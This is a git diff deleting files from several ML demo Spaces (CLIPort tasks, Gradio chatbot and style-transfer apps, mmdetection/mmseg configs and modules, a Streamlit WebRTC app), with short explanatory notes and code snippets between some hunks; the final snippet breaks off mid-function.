- changed_utterance = Utterance.from_phonemes(self.utterance_hello_hiho.phonemes)
- self.assertEqual(len(changed_utterance.breath_groups), 2)
- accent_phrases = list(
- chain.from_iterable(
- breath_group.accent_phrases
- for breath_group in changed_utterance.breath_groups
- )
- )
- for prev, cent, post in zip(
- [None] + accent_phrases[:-1],
- accent_phrases,
- accent_phrases[1:] + [None],
- ):
- mora_num = len(cent.moras)
- accent = cent.accent
-
- if prev is not None:
- for phoneme in prev.phonemes:
- self.assertEqual(phoneme.contexts["g1"], str(mora_num))
- self.assertEqual(phoneme.contexts["g2"], str(accent))
-
- if post is not None:
- for phoneme in post.phonemes:
- self.assertEqual(phoneme.contexts["e1"], str(mora_num))
- self.assertEqual(phoneme.contexts["e2"], str(accent))
-
- for phoneme in cent.phonemes:
- self.assertEqual(
- phoneme.contexts["k2"],
- str(
- sum(
- [
- len(breath_group.accent_phrases)
- for breath_group in changed_utterance.breath_groups
- ]
- )
- ),
- )
-
- for prev, cent, post in zip(
- [None] + changed_utterance.breath_groups[:-1],
- changed_utterance.breath_groups,
- changed_utterance.breath_groups[1:] + [None],
- ):
- accent_phrase_num = len(cent.accent_phrases)
-
- if prev is not None:
- for phoneme in prev.phonemes:
- self.assertEqual(phoneme.contexts["j1"], str(accent_phrase_num))
-
- if post is not None:
- for phoneme in post.phonemes:
- self.assertEqual(phoneme.contexts["h1"], str(accent_phrase_num))
-
- for phoneme in cent.phonemes:
- self.assertEqual(phoneme.contexts["i1"], str(accent_phrase_num))
- self.assertEqual(
- phoneme.contexts["i5"],
- str(accent_phrases.index(cent.accent_phrases[0]) + 1),
- )
- self.assertEqual(
- phoneme.contexts["i6"],
- str(
- len(accent_phrases)
- - accent_phrases.index(cent.accent_phrases[0])
- ),
- )
-
- def test_labels(self):
- self.assertEqual(self.utterance_hello_hiho.labels, self.test_case_hello_hiho)
diff --git a/spaces/Gen-Sim/Gen-Sim/cliport/generated_tasks/stack_blocks_in_container.py b/spaces/Gen-Sim/Gen-Sim/cliport/generated_tasks/stack_blocks_in_container.py
deleted file mode 100644
index d7121c06c76a825c008373a64e180366249358bd..0000000000000000000000000000000000000000
--- a/spaces/Gen-Sim/Gen-Sim/cliport/generated_tasks/stack_blocks_in_container.py
+++ /dev/null
@@ -1,51 +0,0 @@
-import numpy as np
-import os
-import pybullet as p
-import random
-from cliport.tasks import primitives
-from cliport.tasks.grippers import Spatula
-from cliport.tasks.task import Task
-from cliport.utils import utils
-import numpy as np
-from cliport.tasks.task import Task
-from cliport.utils import utils
-
-class StackBlocksInContainer(Task):
- """Pick up five blocks of different colors (red, blue, green, yellow, and orange)
- and stack them in a container in a specific sequence.
- The bottom of the stack should start with a red block followed by a blue,
- green, yellow and finally an orange block at the top."""
-
- def __init__(self):
- super().__init__()
- self.max_steps = 15
- self.lang_template = "stack the blocks in the container in the following order: {order}"
- self.task_completed_desc = "done stacking blocks in container."
- self.order = ['red', 'blue', 'green', 'yellow', 'orange']
- self.colors = [utils.COLORS[color] for color in self.order]
-
- def reset(self, env):
- super().reset(env)
-
- # Add container.
- container_size = (0.15, 0.15, 0.15) # x, y, z dimensions for the container size
- container_pose = self.get_random_pose(env, container_size)
- container_urdf = 'container/container-template.urdf'
- replace = {'DIM': container_size, 'HALF': (container_size[0] / 2, container_size[1] / 2, container_size[2] / 2)}
- container_urdf = self.fill_template(container_urdf, replace)
- env.add_object(container_urdf, container_pose, 'fixed')
-
- # Add blocks.
- block_size = (0.04, 0.04, 0.04) # x, y, z dimensions for the block size
- block_urdf = 'block/block.urdf'
- blocks = []
- for color in self.colors:
- block_pose = self.get_random_pose(env, block_size)
- block_id = env.add_object(block_urdf, block_pose, color=color)
- blocks.append(block_id)
-
- # Goal: each block is stacked in the container in the specified order.
- for i in range(len(blocks)):
- self.add_goal(objs=[blocks[i]], matches=np.ones((1, 1)), targ_poses=[container_pose], replace=False,
- rotations=True, metric='pose', params=None, step_max_reward=1 / len(blocks),
- language_goal=self.lang_template.format(order=', '.join(self.order)))
\ No newline at end of file
diff --git a/spaces/Gen-Sim/Gen-Sim/scripts/regenerate_gpt_datasets.sh b/spaces/Gen-Sim/Gen-Sim/scripts/regenerate_gpt_datasets.sh
deleted file mode 100644
index e4da318dd92eca0af03771320d3831db08d340c7..0000000000000000000000000000000000000000
--- a/spaces/Gen-Sim/Gen-Sim/scripts/regenerate_gpt_datasets.sh
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/bin/bash
-
-DATA_DIR=$1
-TASK=$2
-DISP=False
-
-echo "Generating dataset... Folder: $DATA_DIR"
-
-# sh scripts/generate_gpt_datasets.sh data "align-rope assembling-kits-seq-seen-colors assembling-kits-seq-unseen-colors packing-shapes packing-boxes-pairs-seen-colors packing-boxes-pairs-unseen-colors packing-seen-google-objects-seq packing-unseen-google-objects-seq packing-seen-google-objects-group packing-unseen-google-objects-group put-block-in-bowl-seen-colors put-block-in-bowl-unseen-colors stack-block-pyramid-seq-seen-colors stack-block-pyramid-seq-unseen-colors separating-piles-seen-colors separating-piles-unseen-colors towers-of-hanoi-seq-seen-colors towers-of-hanoi-seq-unseen-colors
-# sh scripts/generate_gpt_datasets.sh data "assemble-single-car stack-color-coordinated-blocks color-structured-block-tower insert-blocks-into-fixture construct-corner-building colored-cylinder-in-square color-coordinated-block-tower build-house align-pair-colored-blocks-along-line insert-sphere-into-container build-wheel build-two-circles build-car build-bridge manipulating-two-ropes rainbow-stack mix-piles stack-blocks-in-container"
-# You can parallelize these depending on how much resources you have
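-# Illustrative invocation (added; the data folder and task names are placeholders):
-# sh scripts/regenerate_gpt_datasets.sh data "build-car build-house"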
-
-#############################
-## Language-Conditioned Tasks
-
-# LANG_TASKS='align-rope assembling-kits-seq-seen-colors'
-trap "kill 0" SIGINT
-
-LANG_TASKS=$2
-
-for task in $LANG_TASKS
- do
- python cliport/demos.py n=200 task=$task mode=train data_dir=$DATA_DIR disp=$DISP record.save_video=False +regenerate_data=True &
- python cliport/demos.py n=50 task=$task mode=val data_dir=$DATA_DIR disp=$DISP record.save_video=False +regenerate_data=True &
- python cliport/demos.py n=100 task=$task mode=test data_dir=$DATA_DIR disp=$DISP record.save_video=False +regenerate_data=True &
- done
-wait
-
-echo "Finished Language Tasks."
-
-
diff --git a/spaces/Gradio-Blocks/Michael_Scott_Bot_Gradio_Blocks/app.py b/spaces/Gradio-Blocks/Michael_Scott_Bot_Gradio_Blocks/app.py
deleted file mode 100644
index f766020c8dad16ae0052ca17c9b273597324c389..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/Michael_Scott_Bot_Gradio_Blocks/app.py
+++ /dev/null
@@ -1,65 +0,0 @@
-from transformers import AutoTokenizer, AutoModelForCausalLM
-import torch
-import gradio as gr
-
-tokenizer = AutoTokenizer.from_pretrained("natdon/DialoGPT_Michael_Scott")
-model = AutoModelForCausalLM.from_pretrained("natdon/DialoGPT_Michael_Scott")
-
-chat_history_ids = None
-step = 0
-
-
-def predict(input, chat_history_ids=chat_history_ids, step=step):
- # encode the new user input, add the eos_token and return a tensor in Pytorch
- new_user_input_ids = tokenizer.encode(
- input + tokenizer.eos_token, return_tensors='pt')
-
- # append the new user input tokens to the chat history
- bot_input_ids = torch.cat(
- [chat_history_ids, new_user_input_ids], dim=-1) if step > 0 else new_user_input_ids
-
- # generated a response while limiting the total chat history to 1000 tokens,
- chat_history_ids = model.generate(
- bot_input_ids, max_length=1000,
- pad_token_id=tokenizer.eos_token_id,
- no_repeat_ngram_size=3,
- do_sample=True,
- top_k=100,
- top_p=0.7,
- temperature=0.8
- )
- step = step + 1
- output = tokenizer.decode(
- chat_history_ids[:, bot_input_ids.shape[-1]:][0], skip_special_tokens=True)
- return output
-
-
-demo = gr.Blocks()
-
-with demo:
- gr.Markdown(
- """
-
-
-
- ## Speak with Michael by typing in the input box below.
-
- """
- )
-
- with gr.Row():
- with gr.Column():
- inp = gr.Textbox(
- label="Enter text to converse with Michael here:",
- lines=1,
- max_lines=1,
- value="Wow this is hard",
- placeholder="What do you think of Toby?",
- )
- btn = gr.Button("Submit")
- out = gr.Textbox(lines=3)
- # btn = gr.Button("Submit")
- inp.submit(fn=predict, inputs=inp, outputs=out)
- btn.click(fn=predict, inputs=inp, outputs=out)
-
-demo.launch()
diff --git a/spaces/Gradio-Blocks/stylish_ape/app.py b/spaces/Gradio-Blocks/stylish_ape/app.py
deleted file mode 100644
index e7be672b25bbfaff094fa462e1e23eba76c25087..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/stylish_ape/app.py
+++ /dev/null
@@ -1,52 +0,0 @@
-# %%
-import gradio as gr
-
-example_generated_ape_super = "examples/generated_ape_super_resolution.jpg"
-example_generated_ape = "examples/generated_ape.png"
-example_stylish_ape = "examples/stylish_ape.png"
-example_style_starry_night = "examples/starry_night.jpeg"
-examples = [
- [example_generated_ape, example_style_starry_night, False],
- ["examples/another_generated_ape.png", "examples/The Scream (1893) by Edvard Munch.jpg", False],
- ["examples/ape02.png", "examples/Self-Portrait Without a Beard (1889) by Vincent van Gogh.jpg", True],
- ["examples/ape03.png", "examples/Oberon, Titania, and Puck with Fairies Dancing (1786) by William Blake.jpg", True],
-]
-
-ape_gen = gr.Interface.load("spaces/ykilcher/apes")
-super_resolution = gr.Interface.load("spaces/akhaliq/SwinIR")
-style_transfer = gr.Interface.load("spaces/aravinds1811/neural-style-transfer")
-
-def generate_ape(num_images=1, interpolate=False):
- return ape_gen(num_images, interpolate)
-
-def perform_style_transfer(content_image, style_image, is_super_resolution=False):
- stylish_ape = style_transfer(content_image, style_image)
- if is_super_resolution:
- stylish_ape = super_resolution(stylish_ape)
- return stylish_ape
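-# Example call outside the UI (added as a sketch), using the bundled example images:
-# stylish = perform_style_transfer(example_generated_ape, example_style_starry_night, False)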
-
-# %%
-with gr.Blocks() as demo:
- button_generate_ape = gr.Button("Generate Ape")
-
- generated_ape = gr.Image(example_generated_ape, label="Generated Ape", type="filepath")
- style_image_input = gr.Image(example_style_starry_night, label="Stylish Image", type="filepath")
- style_in_super_resolution = gr.Checkbox(True, label="Super resolution!")
- stylish_ape = gr.Image(example_stylish_ape, label="Stylish Ape")
-
- gr.Interface(
- fn=perform_style_transfer,
- inputs=[generated_ape, style_image_input, style_in_super_resolution],
- outputs=stylish_ape,
- examples=examples,
- allow_flagging="never",
- )
- with gr.Row():
- gr.Markdown("Apes by ykilcher, style transfer by Neural Style Transfer, and super resolution by SwinIR.")
- with gr.Row():
- gr.Markdown("")
-
- button_generate_ape.click(generate_ape, inputs=[], outputs=generated_ape)
-
-demo.launch(enable_queue=False)
-# %%
\ No newline at end of file
diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py
deleted file mode 100644
index 6ed5bcbb090b29ee57444d35b2eab5f23b58c2ee..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py
+++ /dev/null
@@ -1,131 +0,0 @@
-_base_ = [
- '../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
-]
-# model settings
-model = dict(
- type='GridRCNN',
- pretrained='torchvision://resnet50',
- backbone=dict(
- type='ResNet',
- depth=50,
- num_stages=4,
- out_indices=(0, 1, 2, 3),
- frozen_stages=1,
- norm_cfg=dict(type='BN', requires_grad=True),
- norm_eval=True,
- style='pytorch'),
- neck=dict(
- type='FPN',
- in_channels=[256, 512, 1024, 2048],
- out_channels=256,
- num_outs=5),
- rpn_head=dict(
- type='RPNHead',
- in_channels=256,
- feat_channels=256,
- anchor_generator=dict(
- type='AnchorGenerator',
- scales=[8],
- ratios=[0.5, 1.0, 2.0],
- strides=[4, 8, 16, 32, 64]),
- bbox_coder=dict(
- type='DeltaXYWHBBoxCoder',
- target_means=[.0, .0, .0, .0],
- target_stds=[1.0, 1.0, 1.0, 1.0]),
- loss_cls=dict(
- type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
- loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
- roi_head=dict(
- type='GridRoIHead',
- bbox_roi_extractor=dict(
- type='SingleRoIExtractor',
- roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
- out_channels=256,
- featmap_strides=[4, 8, 16, 32]),
- bbox_head=dict(
- type='Shared2FCBBoxHead',
- with_reg=False,
- in_channels=256,
- fc_out_channels=1024,
- roi_feat_size=7,
- num_classes=80,
- bbox_coder=dict(
- type='DeltaXYWHBBoxCoder',
- target_means=[0., 0., 0., 0.],
- target_stds=[0.1, 0.1, 0.2, 0.2]),
- reg_class_agnostic=False),
- grid_roi_extractor=dict(
- type='SingleRoIExtractor',
- roi_layer=dict(type='RoIAlign', output_size=14, sampling_ratio=0),
- out_channels=256,
- featmap_strides=[4, 8, 16, 32]),
- grid_head=dict(
- type='GridHead',
- grid_points=9,
- num_convs=8,
- in_channels=256,
- point_feat_channels=64,
- norm_cfg=dict(type='GN', num_groups=36),
- loss_grid=dict(
- type='CrossEntropyLoss', use_sigmoid=True, loss_weight=15))),
- # model training and testing settings
- train_cfg=dict(
- rpn=dict(
- assigner=dict(
- type='MaxIoUAssigner',
- pos_iou_thr=0.7,
- neg_iou_thr=0.3,
- min_pos_iou=0.3,
- ignore_iof_thr=-1),
- sampler=dict(
- type='RandomSampler',
- num=256,
- pos_fraction=0.5,
- neg_pos_ub=-1,
- add_gt_as_proposals=False),
- allowed_border=0,
- pos_weight=-1,
- debug=False),
- rpn_proposal=dict(
- nms_pre=2000,
- max_per_img=2000,
- nms=dict(type='nms', iou_threshold=0.7),
- min_bbox_size=0),
- rcnn=dict(
- assigner=dict(
- type='MaxIoUAssigner',
- pos_iou_thr=0.5,
- neg_iou_thr=0.5,
- min_pos_iou=0.5,
- ignore_iof_thr=-1),
- sampler=dict(
- type='RandomSampler',
- num=512,
- pos_fraction=0.25,
- neg_pos_ub=-1,
- add_gt_as_proposals=True),
- pos_radius=1,
- pos_weight=-1,
- max_num_grid=192,
- debug=False)),
- test_cfg=dict(
- rpn=dict(
- nms_pre=1000,
- max_per_img=1000,
- nms=dict(type='nms', iou_threshold=0.7),
- min_bbox_size=0),
- rcnn=dict(
- score_thr=0.03,
- nms=dict(type='nms', iou_threshold=0.3),
- max_per_img=100)))
-# optimizer
-optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
-optimizer_config = dict(grad_clip=None)
-# learning policy
-lr_config = dict(
- policy='step',
- warmup='linear',
- warmup_iters=3665,
- warmup_ratio=1.0 / 80,
- step=[17, 23])
-runner = dict(type='EpochBasedRunner', max_epochs=25)
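Configs like the one deleted above are plain Python dicts consumed through mmcv's `Config`. A rough sketch of how such a file is typically loaded and built into a detector (assumes mmdet/mmcv are installed; the path is illustrative):

```python
from mmcv import Config
from mmdet.models import build_detector

# illustrative path; point it at wherever the config file actually lives
cfg = Config.fromfile('configs/grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py')

# train_cfg/test_cfg are nested inside `model` in this config style,
# so the model dict alone is enough to instantiate the detector
model = build_detector(cfg.model)
print(type(model).__name__)  # GridRCNN
```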
diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/lvis/mask_rcnn_r50_fpn_sample1e-3_mstrain_1x_lvis_v1.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/lvis/mask_rcnn_r50_fpn_sample1e-3_mstrain_1x_lvis_v1.py
deleted file mode 100644
index 92ddb526d7ea7a011e10aa82cbd1bd62773b35d6..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/lvis/mask_rcnn_r50_fpn_sample1e-3_mstrain_1x_lvis_v1.py
+++ /dev/null
@@ -1,31 +0,0 @@
-_base_ = [
- '../_base_/models/mask_rcnn_r50_fpn.py',
- '../_base_/datasets/lvis_v1_instance.py',
- '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
-]
-model = dict(
- roi_head=dict(
- bbox_head=dict(num_classes=1203), mask_head=dict(num_classes=1203)),
- test_cfg=dict(
- rcnn=dict(
- score_thr=0.0001,
- # LVIS allows up to 300
- max_per_img=300)))
-img_norm_cfg = dict(
- mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
-train_pipeline = [
- dict(type='LoadImageFromFile'),
- dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
- dict(
- type='Resize',
- img_scale=[(1333, 640), (1333, 672), (1333, 704), (1333, 736),
- (1333, 768), (1333, 800)],
- multiscale_mode='value',
- keep_ratio=True),
- dict(type='RandomFlip', flip_ratio=0.5),
- dict(type='Normalize', **img_norm_cfg),
- dict(type='Pad', size_divisor=32),
- dict(type='DefaultFormatBundle'),
- dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
-]
-data = dict(train=dict(dataset=dict(pipeline=train_pipeline)))
diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/mmdet/models/backbones/ssd_vgg.py b/spaces/Gradio-Blocks/uniformer_image_detection/mmdet/models/backbones/ssd_vgg.py
deleted file mode 100644
index cbc4fbb2301afc002f47abb9ed133a500d6cf23f..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_detection/mmdet/models/backbones/ssd_vgg.py
+++ /dev/null
@@ -1,169 +0,0 @@
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-from mmcv.cnn import VGG, constant_init, kaiming_init, normal_init, xavier_init
-from mmcv.runner import load_checkpoint
-
-from mmdet.utils import get_root_logger
-from ..builder import BACKBONES
-
-
-@BACKBONES.register_module()
-class SSDVGG(VGG):
- """VGG Backbone network for single-shot-detection.
-
- Args:
- input_size (int): width and height of input, from {300, 512}.
- depth (int): Depth of vgg, from {11, 13, 16, 19}.
- out_indices (Sequence[int]): Output from which stages.
-
- Example:
- >>> self = SSDVGG(input_size=300, depth=11)
- >>> self.eval()
- >>> inputs = torch.rand(1, 3, 300, 300)
- >>> level_outputs = self.forward(inputs)
- >>> for level_out in level_outputs:
- ... print(tuple(level_out.shape))
- (1, 1024, 19, 19)
- (1, 512, 10, 10)
- (1, 256, 5, 5)
- (1, 256, 3, 3)
- (1, 256, 1, 1)
- """
- extra_setting = {
- 300: (256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256),
- 512: (256, 'S', 512, 128, 'S', 256, 128, 'S', 256, 128, 'S', 256, 128),
- }
-
- def __init__(self,
- input_size,
- depth,
- with_last_pool=False,
- ceil_mode=True,
- out_indices=(3, 4),
- out_feature_indices=(22, 34),
- l2_norm_scale=20.):
- # TODO: in_channels for mmcv.VGG
- super(SSDVGG, self).__init__(
- depth,
- with_last_pool=with_last_pool,
- ceil_mode=ceil_mode,
- out_indices=out_indices)
- assert input_size in (300, 512)
- self.input_size = input_size
-
- self.features.add_module(
- str(len(self.features)),
- nn.MaxPool2d(kernel_size=3, stride=1, padding=1))
- self.features.add_module(
- str(len(self.features)),
- nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6))
- self.features.add_module(
- str(len(self.features)), nn.ReLU(inplace=True))
- self.features.add_module(
- str(len(self.features)), nn.Conv2d(1024, 1024, kernel_size=1))
- self.features.add_module(
- str(len(self.features)), nn.ReLU(inplace=True))
- self.out_feature_indices = out_feature_indices
-
- self.inplanes = 1024
- self.extra = self._make_extra_layers(self.extra_setting[input_size])
- self.l2_norm = L2Norm(
- self.features[out_feature_indices[0] - 1].out_channels,
- l2_norm_scale)
-
- def init_weights(self, pretrained=None):
- """Initialize the weights in backbone.
-
- Args:
- pretrained (str, optional): Path to pre-trained weights.
- Defaults to None.
- """
- if isinstance(pretrained, str):
- logger = get_root_logger()
- load_checkpoint(self, pretrained, strict=False, logger=logger)
- elif pretrained is None:
- for m in self.features.modules():
- if isinstance(m, nn.Conv2d):
- kaiming_init(m)
- elif isinstance(m, nn.BatchNorm2d):
- constant_init(m, 1)
- elif isinstance(m, nn.Linear):
- normal_init(m, std=0.01)
- else:
- raise TypeError('pretrained must be a str or None')
-
- for m in self.extra.modules():
- if isinstance(m, nn.Conv2d):
- xavier_init(m, distribution='uniform')
-
- constant_init(self.l2_norm, self.l2_norm.scale)
-
- def forward(self, x):
- """Forward function."""
- outs = []
- for i, layer in enumerate(self.features):
- x = layer(x)
- if i in self.out_feature_indices:
- outs.append(x)
- for i, layer in enumerate(self.extra):
- x = F.relu(layer(x), inplace=True)
- if i % 2 == 1:
- outs.append(x)
- outs[0] = self.l2_norm(outs[0])
- if len(outs) == 1:
- return outs[0]
- else:
- return tuple(outs)
-
- def _make_extra_layers(self, outplanes):
- layers = []
- kernel_sizes = (1, 3)
- num_layers = 0
- outplane = None
- for i in range(len(outplanes)):
- if self.inplanes == 'S':
- self.inplanes = outplane
- continue
- k = kernel_sizes[num_layers % 2]
- if outplanes[i] == 'S':
- outplane = outplanes[i + 1]
- conv = nn.Conv2d(
- self.inplanes, outplane, k, stride=2, padding=1)
- else:
- outplane = outplanes[i]
- conv = nn.Conv2d(
- self.inplanes, outplane, k, stride=1, padding=0)
- layers.append(conv)
- self.inplanes = outplanes[i]
- num_layers += 1
- if self.input_size == 512:
- layers.append(nn.Conv2d(self.inplanes, 256, 4, padding=1))
-
- return nn.Sequential(*layers)
-
-
-class L2Norm(nn.Module):
-
- def __init__(self, n_dims, scale=20., eps=1e-10):
- """L2 normalization layer.
-
- Args:
- n_dims (int): Number of dimensions to be normalized
- scale (float, optional): Defaults to 20..
- eps (float, optional): Used to avoid division by zero.
- Defaults to 1e-10.
- """
- super(L2Norm, self).__init__()
- self.n_dims = n_dims
- self.weight = nn.Parameter(torch.Tensor(self.n_dims))
- self.eps = eps
- self.scale = scale
-
- def forward(self, x):
- """Forward function."""
- # compute the normalization in FP32 during FP16 training
- x_float = x.float()
- norm = x_float.pow(2).sum(1, keepdim=True).sqrt() + self.eps
- return (self.weight[None, :, None, None].float().expand_as(x_float) *
- x_float / norm).type_as(x)
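The `L2Norm` module above normalizes each spatial position's channel vector to unit L2 norm and rescales it with a learned per-channel weight. A quick sanity check of that arithmetic in plain PyTorch (illustrative shapes, not taken from the file):

```python
import torch
import torch.nn.functional as F

x = torch.randn(2, 512, 38, 38)           # (batch, channels, H, W), e.g. conv4_3 features
weight = torch.full((512,), 20.0)         # per-channel scale, initialised like l2_norm_scale

norm = x.pow(2).sum(1, keepdim=True).sqrt() + 1e-10
manual = weight[None, :, None, None] * x / norm

# F.normalize does the same channel-wise normalisation (up to eps handling)
reference = weight[None, :, None, None] * F.normalize(x, p=2, dim=1, eps=1e-10)
print(torch.allclose(manual, reference, atol=1e-5))   # True
```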
diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/datasets/pipelines/test_time_aug.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/datasets/pipelines/test_time_aug.py
deleted file mode 100644
index 473a12bc86b57e564c415ff8bdb1e431425370db..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/datasets/pipelines/test_time_aug.py
+++ /dev/null
@@ -1,133 +0,0 @@
-import warnings
-
-import mmcv
-
-from ..builder import PIPELINES
-from .compose import Compose
-
-
-@PIPELINES.register_module()
-class MultiScaleFlipAug(object):
- """Test-time augmentation with multiple scales and flipping.
-
- An example configuration is as follows:
-
- .. code-block::
-
- img_scale=(2048, 1024),
- img_ratios=[0.5, 1.0],
- flip=True,
- transforms=[
- dict(type='Resize', keep_ratio=True),
- dict(type='RandomFlip'),
- dict(type='Normalize', **img_norm_cfg),
- dict(type='Pad', size_divisor=32),
- dict(type='ImageToTensor', keys=['img']),
- dict(type='Collect', keys=['img']),
- ]
-
- After MultiScaleFlipAug with the above configuration, the results are wrapped
- into lists of the same length as follows:
-
- .. code-block::
-
- dict(
- img=[...],
- img_shape=[...],
- scale=[(1024, 512), (1024, 512), (2048, 1024), (2048, 1024)]
- flip=[False, True, False, True]
- ...
- )
-
- Args:
- transforms (list[dict]): Transforms to apply in each augmentation.
- img_scale (None | tuple | list[tuple]): Image scales for resizing.
- img_ratios (float | list[float]): Image ratios for resizing.
- flip (bool): Whether to apply flip augmentation. Default: False.
- flip_direction (str | list[str]): Flip augmentation directions,
- options are "horizontal" and "vertical". If flip_direction is list,
- multiple flip augmentations will be applied.
- It has no effect when flip == False. Default: "horizontal".
- """
-
- def __init__(self,
- transforms,
- img_scale,
- img_ratios=None,
- flip=False,
- flip_direction='horizontal'):
- self.transforms = Compose(transforms)
- if img_ratios is not None:
- img_ratios = img_ratios if isinstance(img_ratios,
- list) else [img_ratios]
- assert mmcv.is_list_of(img_ratios, float)
- if img_scale is None:
- # mode 1: given img_scale=None and a range of image ratio
- self.img_scale = None
- assert mmcv.is_list_of(img_ratios, float)
- elif isinstance(img_scale, tuple) and mmcv.is_list_of(
- img_ratios, float):
- assert len(img_scale) == 2
- # mode 2: given a scale and a range of image ratio
- self.img_scale = [(int(img_scale[0] * ratio),
- int(img_scale[1] * ratio))
- for ratio in img_ratios]
- else:
- # mode 3: given multiple scales
- self.img_scale = img_scale if isinstance(img_scale,
- list) else [img_scale]
- assert mmcv.is_list_of(self.img_scale, tuple) or self.img_scale is None
- self.flip = flip
- self.img_ratios = img_ratios
- self.flip_direction = flip_direction if isinstance(
- flip_direction, list) else [flip_direction]
- assert mmcv.is_list_of(self.flip_direction, str)
- if not self.flip and self.flip_direction != ['horizontal']:
- warnings.warn(
- 'flip_direction has no effect when flip is set to False')
- if (self.flip
- and not any([t['type'] == 'RandomFlip' for t in transforms])):
- warnings.warn(
- 'flip has no effect when RandomFlip is not in transforms')
-
- def __call__(self, results):
- """Call function to apply test time augment transforms on results.
-
- Args:
- results (dict): Result dict contains the data to transform.
-
- Returns:
- dict[str: list]: The augmented data, where each value is wrapped
- into a list.
- """
-
- aug_data = []
- if self.img_scale is None and mmcv.is_list_of(self.img_ratios, float):
- h, w = results['img'].shape[:2]
- img_scale = [(int(w * ratio), int(h * ratio))
- for ratio in self.img_ratios]
- else:
- img_scale = self.img_scale
- flip_aug = [False, True] if self.flip else [False]
- for scale in img_scale:
- for flip in flip_aug:
- for direction in self.flip_direction:
- _results = results.copy()
- _results['scale'] = scale
- _results['flip'] = flip
- _results['flip_direction'] = direction
- data = self.transforms(_results)
- aug_data.append(data)
- # list of dict to dict of list
- aug_data_dict = {key: [] for key in aug_data[0]}
- for data in aug_data:
- for key, val in data.items():
- aug_data_dict[key].append(val)
- return aug_data_dict
-
- def __repr__(self):
- repr_str = self.__class__.__name__
- repr_str += f'(transforms={self.transforms}, '
- repr_str += f'img_scale={self.img_scale}, flip={self.flip}, '
- repr_str += f'flip_direction={self.flip_direction})'
- return repr_str
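The docstring above describes how one base scale, a list of ratios, and a flip flag multiply out into augmented copies. A small standalone sketch of that "mode 2" expansion:

```python
# mode 2: a base img_scale plus ratios yields one resized scale per ratio;
# enabling flip doubles the number of augmented copies per image.
img_scale = (2048, 1024)
img_ratios = [0.5, 1.0]
flip = True

scales = [(int(img_scale[0] * r), int(img_scale[1] * r)) for r in img_ratios]
flips = [False, True] if flip else [False]

print(scales)                    # [(1024, 512), (2048, 1024)]
print(len(scales) * len(flips))  # 4 augmented copies, matching the docstring example
```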
diff --git a/spaces/HCMUT-GraduateThesis-HNTThinh/rgbdsod-multimae-demo/webrtc_app.py b/spaces/HCMUT-GraduateThesis-HNTThinh/rgbdsod-multimae-demo/webrtc_app.py
deleted file mode 100644
index 5561aab9a984a1f41230e742aad935b9eab7016c..0000000000000000000000000000000000000000
--- a/spaces/HCMUT-GraduateThesis-HNTThinh/rgbdsod-multimae-demo/webrtc_app.py
+++ /dev/null
@@ -1,57 +0,0 @@
-import threading
-
-import av
-import numpy as np
-import streamlit as st
-from streamlit_webrtc import webrtc_streamer
-
-from app_utils import ImgContainer
-from base_model import BaseRGBDModel
-from color_selection_ui import color_selection_ui
-from depth_model import BaseDepthModel
-from depth_selection_ui import depth_selection_ui
-from model import base_inference
-from sod_selection_ui import sod_selection_ui
-
-lock = threading.Lock()
-
-rtc_configuration = {
- "iceServers": [{"urls": [
- "stun:stun1.l.google.com:19302",
- "stun:stun2.l.google.com:19302",
- "stun:stun3.l.google.com:19302",
- "stun:stun4.l.google.com:19302",
- ]}],
-}
-
-img_container = ImgContainer()
-img_container.frame_rate.reset()
-
-def webrtc_app(
- depth_model: BaseDepthModel,
- sod_model: BaseRGBDModel,
- color: np.ndarray
-):
- def video_frame_callback(frame: av.VideoFrame) -> av.VideoFrame:
- img: np.ndarray = frame.to_ndarray(format="bgr24")
- with lock:
- img_container.img = img
- img_container.frame_rate.count()
- img = img_container.frame_rate.show_fps(img)
- _, pred_sod, _ = base_inference(
- depth_model, sod_model, img, None, color
- )
- return av.VideoFrame.from_ndarray(pred_sod, format="bgr24")
-
-
- st.session_state.ctx = webrtc_streamer(
- key="snapshot",
- video_frame_callback=video_frame_callback,
- rtc_configuration=rtc_configuration
- )
-
-if __name__ == '__main__':
- depth_model = depth_selection_ui(st)
- sod_model = sod_selection_ui(st)
- color = color_selection_ui(st)
- webrtc_app(depth_model, sod_model, color)
\ No newline at end of file
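The callback pattern used above (ndarray in, processed ndarray out, wrapped back into an `av.VideoFrame`) is the core of `streamlit_webrtc`. A stripped-down sketch of just that loop, with a trivial transform standing in for the SOD model (run it via `streamlit run`):

```python
import av
import numpy as np
from streamlit_webrtc import webrtc_streamer

def video_frame_callback(frame: av.VideoFrame) -> av.VideoFrame:
    img = frame.to_ndarray(format="bgr24")            # incoming camera frame as a NumPy array
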